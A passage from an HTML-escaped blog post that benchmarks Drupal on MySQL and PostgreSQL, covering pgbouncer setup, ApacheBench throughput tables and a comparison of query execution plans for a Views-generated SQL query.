    &lt;td&gt;tags&lt;/td&gt;&lt;td&gt;1000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;vocabularies&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;menus&lt;/td&gt;&lt;td&gt;5000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;nodes&lt;/td&gt;&lt;td&gt;100000&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;max comments per node&lt;/td&gt;&lt;td&gt;10&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;I generated this data in the MySQL installation first. The data was then migrated to the PostgreSQL instance using the &lt;a href='http://drupal.org/project/dbtng_migrator'&gt;dbtng_migrator&lt;/a&gt; module. This ensures the same data is used for all tests against MySQL and PostgreSQL. I covered how to perform this migration in a previous &lt;a href='http://posulliv.github.com/drupal/2012/06/26/migrate-mysql-postgres/'&gt;post&lt;/a&gt;.&lt;/p&gt;

&lt;h2 id='pgbouncer'&gt;pgbouncer&lt;/h2&gt;

&lt;p&gt;One additional setup item I performed for PostgreSQL was to install &lt;a href='http://pgfoundry.org/projects/pgbouncer'&gt;pgbouncer&lt;/a&gt; and configure Drupal to connect through &lt;code&gt;pgbouncer&lt;/code&gt; instead of directly to PostgreSQL.&lt;/p&gt;

&lt;p&gt;Installation and configuration on Ubuntu 10.04 is straightforward. The steps to install &lt;code&gt;pgbouncer&lt;/code&gt; and the configuration I used are outlined in this &lt;a href='https://gist.github.com/3013089'&gt;gist&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;The main reason for this change is the ApacheBench based test unfairly favors MySQL due to its process model. Each connection results in a new thread being spawned whereas with PostgreSQL, each new connection results in a new process being forked. The overhead of forking a new process is much larger than spawning a new thread. I did collect numbers for PostgreSQL without using &lt;code&gt;pgbouncer&lt;/code&gt; and I do report them in the ApacheBench test section below.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;pgbouncer&lt;/code&gt; maintains a connection pool that Drupal connects so in my &lt;code&gt;settings.php&lt;/code&gt; file for my Drupal PostgreSQL instance, I modified my database settings to be:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='php'&gt;&lt;span class='x'&gt;$databases = array (&lt;/span&gt;
&lt;span class='x'&gt;  &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;  array (&lt;/span&gt;
&lt;span class='x'&gt;    &amp;#39;default&amp;#39; =&amp;gt;&lt;/span&gt;
&lt;span class='x'&gt;    array (&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;database&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;username&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;password&amp;#39; =&amp;gt; &amp;#39;drupal&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;host&amp;#39; =&amp;gt; &amp;#39;localhost&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;port&amp;#39; =&amp;gt; &amp;#39;6432&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;driver&amp;#39; =&amp;gt; &amp;#39;pgsql&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;      &amp;#39;prefix&amp;#39; =&amp;gt; &amp;#39;&amp;#39;,&lt;/span&gt;
&lt;span class='x'&gt;    ),&lt;/span&gt;
&lt;span class='x'&gt;  ),&lt;/span&gt;
&lt;span class='x'&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I performed this configuration step after I generated data in MySQL and migrated it to PostgreSQL.&lt;/p&gt;

&lt;h1 id='anonymous_users_testing_with_apachebench'&gt;Anonymous Users Testing with ApacheBench&lt;/h1&gt;

&lt;p&gt;First, loading the front page for each Drupal site with the &lt;a href='http://drupal.org/project/devel'&gt;devel&lt;/a&gt; module enabled and reporting on query execution times, the following was reported:&lt;/p&gt;
&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;Query Exec Times&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;Executed 65 queries in 31.69 ms&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (with pgbouncer)&lt;/td&gt;
    &lt;td&gt;Executed 66 queries in 49.84 ms&lt;/td&gt;
  &lt;/tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;
    &lt;td&gt;Executed 66 queries in 95 ms&lt;/td&gt;
  &lt;tr&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;Straight out the gate, we can see there is not much difference here. 31 versus 50 ms is not going to be felt by many end users. If &lt;code&gt;pgbouncer&lt;/code&gt; is not used, query execution time is 3 times slower though.&lt;/p&gt;

&lt;p&gt;Next, I went to do some simple benchmarks using ApacheBench. The command used to run &lt;code&gt;ab&lt;/code&gt; was (the number of concurrent connections, X, was the only parameter varied):&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;ab -c X -n 100 http://drupal.url.com/ 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;ab&lt;/code&gt; command was always run from a separate EC2 instance in the same availability zone and never on the same instance as which Drupal was running.&lt;/p&gt;

&lt;p&gt;Results obtained with default Drupal configuration (page cache disabled) but all other caching enabled are shown in the figure below. The raw numbers are presented in the table after the figure.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/first_anon_res.png' alt='First results.' /&gt;
&lt;/div&gt;&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;c = 1&lt;/th&gt;&lt;th&gt;c = 5&lt;/th&gt;&lt;th&gt;c = 10&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;11.71&lt;/td&gt;&lt;td&gt;16.53&lt;/td&gt;&lt;td&gt;16.28&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (using pgbouncer)&lt;/td&gt;&lt;td&gt;8.44&lt;/td&gt;&lt;td&gt;11.03&lt;/td&gt;&lt;td&gt;11.10&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;&lt;td&gt;4.81&lt;/td&gt;&lt;td&gt;7.32&lt;/td&gt;&lt;td&gt;7.22&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;The next test was run after all caches were cleared using &lt;code&gt;drush&lt;/code&gt;. The command issued was:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;drush cc
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Option 1 was then chosen to clear all caches. This was done before each &lt;code&gt;ab&lt;/code&gt; command was run. Results are shown in the figure with raw numbers presented in the table after the figure.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/second_anon_res.png' alt='Second results.' /&gt;
&lt;/div&gt;&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;c = 1&lt;/th&gt;&lt;th&gt;c = 5&lt;/th&gt;&lt;th&gt;c = 10&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;10.50&lt;/td&gt;&lt;td&gt;14.08&lt;/td&gt;&lt;td&gt;6.28&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (using pgbouncer)&lt;/td&gt;&lt;td&gt;7.92&lt;/td&gt;&lt;td&gt;9.23&lt;/td&gt;&lt;td&gt;7.32&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;&lt;td&gt;5&lt;/td&gt;&lt;td&gt;7.04&lt;/td&gt;&lt;td&gt;6.79&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;p&gt;Finally, the same test was run with Drupal&amp;#8217;s page cache enabled. Results are shown in the figure below with raw numbers presented in the table after the figure.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/third_anon_res.png' alt='Third results.' /&gt;
&lt;/div&gt;&lt;table border='1'&gt;
  &lt;tr&gt;
    &lt;th&gt;Database&lt;/th&gt;&lt;th&gt;c = 1&lt;/th&gt;&lt;th&gt;c = 5&lt;/th&gt;&lt;th&gt;c = 10&lt;/th&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;MySQL&lt;/td&gt;&lt;td&gt;144&lt;/td&gt;&lt;td&gt;282&lt;/td&gt;&lt;td&gt;267&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL (using pgbouncer)&lt;/td&gt;&lt;td&gt;120&lt;/td&gt;&lt;td&gt;205&lt;/td&gt;&lt;td&gt;202&lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td&gt;PostgreSQL&lt;/td&gt;&lt;td&gt;35&lt;/td&gt;&lt;td&gt;45&lt;/td&gt;&lt;td&gt;46&lt;/td&gt;
  &lt;/tr&gt;
&lt;/table&gt;
&lt;h1 id='views_queries'&gt;Views Queries&lt;/h1&gt;

&lt;p&gt;The &lt;a href='http://drupal.org/project/views/'&gt;views&lt;/a&gt; module is known to sometimes generate queries that can cause performance problems for MySQL.&lt;/p&gt;

&lt;h2 id='image_gallery_view'&gt;Image Gallery View&lt;/h2&gt;

&lt;p&gt;The first SQL query I want to look is generated by one of the sample templates that come with the Views module. If you click &amp;#8216;Add view from template&amp;#8217; in the Views module, by default, you will only have 1 template to choose from - the Image Gallery template. After creating a view from this template and not modifying anything about that view, I see 2 problematic queries being generated.&lt;/p&gt;

&lt;p&gt;The first query is a query that counts the number of the rows in the result set for this view since this is a paginated view. The second query actually retrieves the results with a LIMIT clause and the appropriate OFFSET dependending on what page of the results the user is currently on. For this post, we&amp;#8217;ll just look at the second query that retries results. That query is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='sql'&gt;&lt;span class='k'&gt;SELECT&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;tid&lt;/span&gt;      &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index_tid&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
       &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;name&lt;/span&gt; &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data_name&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
       &lt;span class='k'&gt;Count&lt;/span&gt;&lt;span class='p'&gt;(&lt;/span&gt;&lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt;&lt;span class='p'&gt;)&lt;/span&gt;         &lt;span class='k'&gt;AS&lt;/span&gt; &lt;span class='n'&gt;num_records&lt;/span&gt; 
&lt;span class='k'&gt;FROM&lt;/span&gt;   &lt;span class='n'&gt;node&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;users&lt;/span&gt; &lt;span class='n'&gt;users_node&lt;/span&gt; 
              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;uid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;users_node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;uid&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt; 
              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;entity_id&lt;/span&gt; 
                 &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;entity_type&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt; 
                       &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;deleted&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;0&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt; 
              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
       &lt;span class='k'&gt;LEFT&lt;/span&gt; &lt;span class='k'&gt;JOIN&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt; 
              &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;taxonomy_index&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;tid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;tid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;((&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;field_data_field_image&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;field_image_fid&lt;/span&gt; &lt;span class='k'&gt;IS&lt;/span&gt; &lt;span class='k'&gt;NOT&lt;/span&gt; &lt;span class='k'&gt;NULL&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;))&lt;/span&gt; 
&lt;span class='k'&gt;GROUP&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;taxonomy_term_data_name&lt;/span&gt;&lt;span class='p'&gt;,&lt;/span&gt; 
          &lt;span class='n'&gt;taxonomy_index_tid&lt;/span&gt; 
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;num_records&lt;/span&gt; &lt;span class='k'&gt;ASC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;24&lt;/span&gt; &lt;span class='k'&gt;offset&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The response time of the query in MySQL versus PostgreSQL is shown in the figure below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/first_query_response_time.png' alt='First query response time results.' /&gt;
&lt;/div&gt;
&lt;p&gt;As seen in the image above, PostgreSQL can execute the query in question in 300ms or less whereas MySQL consistently takes 2800 ms to execute the query.&lt;/p&gt;

&lt;p&gt;The MySQL execution plan looks like:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;*************************** 1. row ***************************
           id: 1
  select_type: SIMPLE
        table: field_data_field_image
         &lt;span class='nb'&gt;type&lt;/span&gt;: ref
possible_keys: PRIMARY,entity_type,deleted,entity_id,field_image_fid
          key: PRIMARY
      key_len: 386
          ref: const
         rows: 19165
        Extra: Using where; Using temporary; Using filesort
*************************** 2. row ***************************
           id: 1
  select_type: SIMPLE
        table: node
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY,node_status_type
          key: PRIMARY
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: Using where
*************************** 3. row ***************************
           id: 1
  select_type: SIMPLE
        table: users_node
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.node.uid
         rows: 1
        Extra: Using where; Using index
*************************** 4. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_index
         &lt;span class='nb'&gt;type&lt;/span&gt;: ref
possible_keys: nid
          key: nid
      key_len: 4
          ref: drupal.field_data_field_image.entity_id
         rows: 1
        Extra: NULL
*************************** 5. row ***************************
           id: 1
  select_type: SIMPLE
        table: taxonomy_term_data
         &lt;span class='nb'&gt;type&lt;/span&gt;: eq_ref
possible_keys: PRIMARY
          key: PRIMARY
      key_len: 4
          ref: drupal.taxonomy_index.tid
         rows: 1
        Extra: NULL
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;MySQL starts from the &lt;code&gt;field_date_field_image&lt;/code&gt; table and since there is no selective predicates in the query, chooses to scan the table using the &lt;code&gt;PRIMARY&lt;/code&gt; key of the table. It then filters the rows scanned using the &lt;code&gt;field_image_fid IS NOT NULL&lt;/code&gt; predicate. Since MySQL only has 1 join algorithm, nested loops, it is used to perform the remainder of the joins. A temporary table is created in memory to store the results of these joins. This is then sorted and the result set limited to the 24 requested.&lt;/p&gt;

&lt;p&gt;The PostgreSQL execution plan looks drastically different.&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt; Limit  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;11712.83..11712.89 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;24 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
   -&amp;gt;  Sort  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;11712.83..11829.24 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
         Sort Key: &lt;span class='o'&gt;(&lt;/span&gt;count&lt;span class='o'&gt;(&lt;/span&gt;node.nid&lt;span class='o'&gt;))&lt;/span&gt;
         -&amp;gt;  HashAggregate  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;9946.90..10412.54 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
               -&amp;gt;  Hash Left Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6174.69..9597.67 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;20&lt;span class='o'&gt;)&lt;/span&gt;
                     Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;taxonomy_index.tid &lt;span class='o'&gt;=&lt;/span&gt; taxonomy_term_data.tid&lt;span class='o'&gt;)&lt;/span&gt;
                     -&amp;gt;  Hash Right Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;6140.19..8922.92 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;46564 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                           Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;taxonomy_index.nid &lt;span class='o'&gt;=&lt;/span&gt; node.nid&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Seq Scan on taxonomy_index  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1510.18 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;92218 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;16&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;5657.14..5657.14 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;
                                 -&amp;gt;  Hash Join  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;2030.71..5657.14 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;
                                       Hash Cond: &lt;span class='o'&gt;(&lt;/span&gt;node.nid &lt;span class='o'&gt;=&lt;/span&gt; field_data_field_image.entity_id&lt;span class='o'&gt;)&lt;/span&gt;
                                       -&amp;gt;  Seq Scan on node  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..2187.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;76533 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             Filter: &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 1&lt;span class='o'&gt;)&lt;/span&gt;
                                       -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1547.66..1547.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                             -&amp;gt;  Seq Scan on field_data_field_image  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..1547.66 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;38644 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;8&lt;span class='o'&gt;)&lt;/span&gt;
                                                   Filter: &lt;span class='o'&gt;((&lt;/span&gt;field_image_fid IS NOT NULL&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;((&lt;/span&gt;entity_type&lt;span class='o'&gt;)&lt;/span&gt;::text &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;node&amp;#39;&lt;/span&gt;::text&lt;span class='o'&gt;)&lt;/span&gt; AND &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;deleted&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; 0::smallint&lt;span class='o'&gt;))&lt;/span&gt;
                     -&amp;gt;  Hash  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;22.00..22.00 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1000 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
                           -&amp;gt;  Seq Scan on taxonomy_term_data  &lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;cost&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;0.00..22.00 &lt;span class='nv'&gt;rows&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;1000 &lt;span class='nv'&gt;width&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;12&lt;span class='o'&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;PostgreSQL has a number of other join algorithms available for use. In particular, for this query, the optimizer has decided that a hash join is the optimal choice.&lt;/p&gt;

&lt;p&gt;PostgreSQL starts by scanning the tiny (1000 rows) &lt;code&gt;taxonomy_term_data&lt;/code&gt; table and constructing an in-memory hash table (the build phase in a hash join). It then probes this hash table for possible matches of &lt;code&gt;taxonomy_index.tid = taxonomy_term_data.tid&lt;/code&gt; for each row that results from a hash join of &lt;code&gt;taxonomy_index&lt;/code&gt; and &lt;code&gt;node&lt;/code&gt;. This hash join was a result of the &lt;code&gt;field_data_field_image&lt;/code&gt; and &lt;code&gt;node&lt;/code&gt; table being join with the &lt;code&gt;field_data_field_image&lt;/code&gt; being used to build a hash table and a sequential scan of &lt;code&gt;node&lt;/code&gt; being used to probe that hash table. Aggregation is then performed and the result set is then sorted by the aggregated value (in this case a count of node ids). Finally, the result set is limited to 24.&lt;/p&gt;

&lt;p&gt;One neat thing about PostgreSQL is planner nodes can be disabled. So to make PostgreSQL execute the query in a similar manner to MySQL, I did:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;enable_hashjoin&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;off;
SET
&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;enable_hashagg&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;off;
SET
&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; &lt;span class='nb'&gt;set &lt;/span&gt;&lt;span class='nv'&gt;enable_mergejoin&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;off;
SET
&lt;span class='nv'&gt;drupal&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;And the execution plan PostgreSQL chose then was:&lt;/p&gt;
